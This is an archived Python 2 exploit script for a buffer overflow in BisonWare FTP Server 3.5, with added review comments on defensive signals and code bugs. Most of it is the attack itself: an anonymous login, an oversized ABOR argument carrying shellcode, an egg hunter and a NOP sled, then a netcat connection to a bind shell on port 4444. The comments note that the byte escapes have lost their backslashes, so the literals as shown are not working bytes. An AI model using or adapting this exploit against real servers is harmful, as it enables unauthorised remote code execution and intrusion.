
BisonWare FTP Server 3.5 Buffer Overflow

Posted on 14 May 2015

#!/usr/bin/python
# Exploit Title: BisonWare FTP Server Version 3.5 Egg Hunting Exploits
# Date: 22 April,2015
# Exploit Author: Bikash Dash
# www.vulnerableghost.com
# Version: BisonWare FTP Server Version 3.5
# Tested on: Windows XP service pack3
# CVE : [N/A]
#
# Review note: archived 2015 proof-of-concept, written for Python 2 (print
# statements, str-typed socket I/O). As extracted here, the byte-escape
# sequences and the CRLF command terminators have lost their backslashes, so
# every string literal below is plain ASCII text rather than the bytes the
# author intended; the literals are kept verbatim and are not repaired.
#
# Defensive reading: the observable pattern is an anonymous FTP login followed
# by an ABOR command carrying an argument of roughly 1.3 KB (shellcode, NOP
# filler, a 32-byte egg hunter, a 4-byte return address and a 205-byte NOP
# sled), then an inbound connection to TCP 4444 on the same host. No vendor
# fix is referenced on this page; unsupported FTP services of this kind are
# best retired or isolated, and an FTP argument of that length is a cheap
# IDS/WAF signal.
import socket, sys, os, time
print " ================================ "
print " -----Vulnerable Gh0st------------ "
print " Bikash Dash(0xfb**) "
print " Bikash Dash, Chanchal Rastogi,manish Tanwar,Aditya Upadhaya "
print " www.vulnerableghost.com "
print "================================= "
if len(sys.argv) != 3:
    print "[*] Usage: %s <target> <port> " % sys.argv[0]
    sys.exit(0)
target = sys.argv[1] #User Passed Argument 1
port = int(sys.argv[2]) #User Passed Argument 2
# NOTE(review): port is parsed but the failure message in the except branch
# below hard-codes ":21", so a mistyped port is reported misleadingly.
shellcode = ("w00tw00t" + "xbdxa9x85x2dx7fxdaxd0xd9x74x24xf4x58x29xc9xb1"
"x56x31x68x13x83xc0x04x03x68xa6x67xd8x83x50xee"
"x23x7cxa0x91xaax99x91x83xc9xeax83x13x99xbfx2f"
"xdfxcfx2bxa4xadxc7x5cx0dx1bx3ex52x8exadxfex38"
"x4cxafx82x42x80x0fxbax8cxd5x4exfbxf1x15x02x54"
"x7dx87xb3xd1xc3x1bxb5x35x48x23xcdx30x8fxd7x67"
"x3axc0x47xf3x74xf8xecx5bxa5xf9x21xb8x99xb0x4e"
"x0bx69x43x86x45x92x75xe6x0axadxb9xebx53xe9x7e"
"x13x26x01x7dxaex31xd2xffx74xb7xc7x58xffx6fx2c"
"x58x2cxe9xa7x56x99x7dxefx7ax1cx51x9bx87x95x54"
"x4cx0exedx72x48x4axb6x1bxc9x36x19x23x09x9exc6"
"x81x41x0dx13xb3x0bx5axd0x8exb3x9ax7ex98xc0xa8"
"x21x32x4fx81xaax9cx88xe6x81x59x06x19x29x9ax0e"
"xdex7dxcax38xf7xfdx81xb8xf8x28x05xe9x56x82xe6"
"x59x17x72x8fxb3x98xadxafxbbx72xd8xf7x75xa6x89"
"x9fx77x58x3cx3cxf1xbex54xacx57x68xc0x0ex8cxa1"
"x77x70xe6x9dx20xe6xbexcbxf6x09x3fxdex55xa5x97"
"x89x2dxa5x23xabx32xe0x03xa2x0bx63xd9xdaxdex15"
"xdexf6x88xb6x4dx9dx48xb0x6dx0ax1fx95x40x43xf5"
"x0bxfaxfdxebxd1x9axc6xafx0dx5fxc8x2exc3xdbxee"
"x20x1dxe3xaax14xf1xb2x64xc2xb7x6cxc7xbcx61xc2"
"x81x28xf7x28x12x2exf8x64xe4xcex49xd1xb1xf1x66"
"xb5x35x8ax9ax25xb9x41x1fx55xf0xcbx36xfex5dx9e"
"x0ax63x5ex75x48x9axddx7fx31x59xfdx0ax34x25xb9"
"xe7x44x36x2cx07xfax37x65") #Payload prefixed with w00tw00t tag
egghunter = ("x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74" "xefxb8x77x30x30x74x8bxfaxafx75xeaxafx75xe7xffxe7") #32 bytes egg hunter NtDisplayString
# NOTE(review): `buffer` shadows the Python 2 builtin of the same name.
buffer = "x90"*(1063 - (len(shellcode)+len(egghunter))) #Align the stack
ebx = "x71x87xA1x7C" #JMP EBX 7CA18771from Shell32.dll
nopsled = "x90"*205 #205 NOP Sled
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[+] Connecting to %s on port %d" % (target,port)
try:
    s.connect((target,port)) #Connect to BisonWare FTP Server
    # The banner and every command reply are read and discarded; nothing
    # checks that the server actually accepted the login.
    s.recv(1024) #Receive 1024 bytes from BisonWare FTP Server
    time.sleep(3) #Wait for 3 seconds before executing next statement
    print "[+] Sending payload"
    s.recv(2000) #Receive 2000 bytes from BisonWare FTP Server
    s.send('USER anonymous ') #Send FTP command 'USER anonymous'
    s.recv(2000) #Receive 2000 bytes from BisonWare FTP Server
    s.send('PASS anonymous ') #Send FTP command 'PASS anonymous'
    s.recv(2000) #Receive 2000 bytes from BisonWare FTP Server
    s.send('ABOR ' + shellcode + buffer + egghunter + ebx + nopsled +' ') #Send FTP command 'ABOR '
    s.close() #Close the socket
    print "[+] Exploit Sent Successfully"
    print "[+] Waiting for 5 sec before spawning shell to " + target + ":4444 "
    print " "
    time.sleep(5) #Wait for 5 seconds before connection to Bind Shell
    # NOTE(review): the command line is built by string concatenation and
    # handed to a shell, so argv[1] is interpreted by the shell as well as by
    # the socket code; subprocess.run([...]) with a list would avoid that.
    os.system("nc -n " + target + " 4444") #Connect to Bind Shell using netcat
    print "[-] Connection lost from " + target + ":4444 "
# NOTE(review): bare except also swallows KeyboardInterrupt and any failure
# from the os.system() call above, and reports all of them as a connect error
# to port 21 regardless of the port actually used.
except:
    print "[-] Could not connect to " + target + ":21 "
    sys.exit(0) #Exit the Exploit POC code execution

 
